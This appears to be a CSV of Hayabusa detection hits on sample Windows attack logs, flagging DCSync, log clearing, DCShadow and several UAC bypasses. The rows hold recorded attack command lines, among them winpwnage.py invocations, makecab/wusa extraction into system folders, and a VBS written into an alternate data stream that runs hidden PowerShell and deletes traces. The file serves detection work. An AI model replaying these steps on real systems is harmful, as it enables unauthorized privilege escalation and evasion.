2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
2019-05-08 12:00:37.572 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
2019-05-08 12:00:37.586 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
2019-05-09 10:59:28.669 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:28.684 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3752 | PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:28.684 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\eventvwr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3752 | Tgt PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:28.950 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x1394a | PID: 3884 | PGUID: 365ABB72-8980-5CD3-0000-00105F451F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0x1394a | PID: 3840 | PGUID: 365ABB72-8980-5CD3-0000-0010134D1F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,Evas | PrivEsc,UAC Bypass via Event Viewer,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 11:00:01.794 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-89A1-5CD3-0000-001013732100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
2019-05-09 11:07:51.131 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" /kickoffelev | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3836 | PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:07:51.131 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:07:56.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:08:00.446 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ? | LID: 0x1394a | PID: 2264 | PGUID: 365ABB72-8B80-5CD3-0000-001065512A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
2019-05-09 11:52:18.765 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1900 | PGUID: 365ABB72-9570-5CD3-0000-00103FC90A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.844 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 1292 | PGUID: 365ABB72-95E2-5CD3-0000-001097410F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.922 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3636 | PGUID: 365ABB72-95E2-5CD3-0000-0010C6440F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.953 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3620 | PGUID: 365ABB72-95E2-5CD3-0000-001083470F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:18.969 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2420 | PGUID: 365ABB72-95E2-5CD3-0000-001074490F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:19.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 3536 | PGUID: 365ABB72-95E3-5CD3-0000-00100C650F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3828 | PGUID: 365ABB72-95E5-5CD3-0000-00101F720F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.265 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3824 | PGUID: 365ABB72-95E5-5CD3-0000-00108F720F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.281 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2852 | PGUID: 365ABB72-95E5-5CD3-0000-001065730F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.297 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2364 | PGUID: 365ABB72-95E5-5CD3-0000-001033750F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:21.594 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 2800 | PGUID: 365ABB72-95E5-5CD3-0000-0010E1890F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,15,info,,Alternate Data Stream Created,Path: C:\Users\IEUser\AppData | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00 | Hash: Unknown,../hayabusa-rules/hayabusa/sysmon/events/15_AlternateDataStreamCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData:tghjx5xz2ky.vbs | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 11:52:23.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3784 | PGUID: 365ABB72-95E7-5CD3-0000-001004970F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
2019-05-09 12:25:24.896 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3184 | PGUID: 365ABB72-9DA4-5CD3-0000-00102E692F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-09 12:25:25.067 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x13add | PID: 2920 | PGUID: 365ABB72-9DA4-5CD3-0000-00107F7A2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
2019-05-10 21:21:57.077 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a4f | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 21:22:02.434 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | Process: c:\python27\python.exe | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 21:22:08.465 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" | Process: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\perfmon.exe"" | LID: 0x13a11 | PID: 1644 | PGUID: 365ABB72-6CF0-5CD5-0000-0010140F1C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 21:22:08.465 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
2019-05-10 22:32:48.200 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 2796 | PGUID: 365ABB72-7D80-5CD5-0000-00100AD01300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:32:48.412 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:32:58.549 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\CompMgmtLauncher.exe"" | LID: 0x141f8 | PID: 2076 | PGUID: 365ABB72-7D86-5CD5-0000-0010CC2E1400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /priv | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""c:\Windows\System32\cmd.exe"" | LID: 0x141f8 | PID: 2524 | PGUID: 365ABB72-7DA9-5CD5-0000-00100ED31400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami Showing Privileges,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:49:29.586 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:29.789 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\NTWDBLIB.dll | Process: c:\python27\python.exe | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:29.789 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:34.946 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 1700 | PGUID: 365ABB72-816E-5CD5-0000-0010FEB62300,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:39.930 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 3608 | PGUID: 365ABB72-8173-5CD5-0000-00102FCD2300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:40.164 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 2676 | PGUID: 365ABB72-8174-5CD5-0000-0010ABE62300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:45.133 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 1052 | PGUID: 365ABB72-8179-5CD5-0000-00102CFF2300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:45.378 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 880 | PGUID: 365ABB72-8179-5CD5-0000-001083182400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
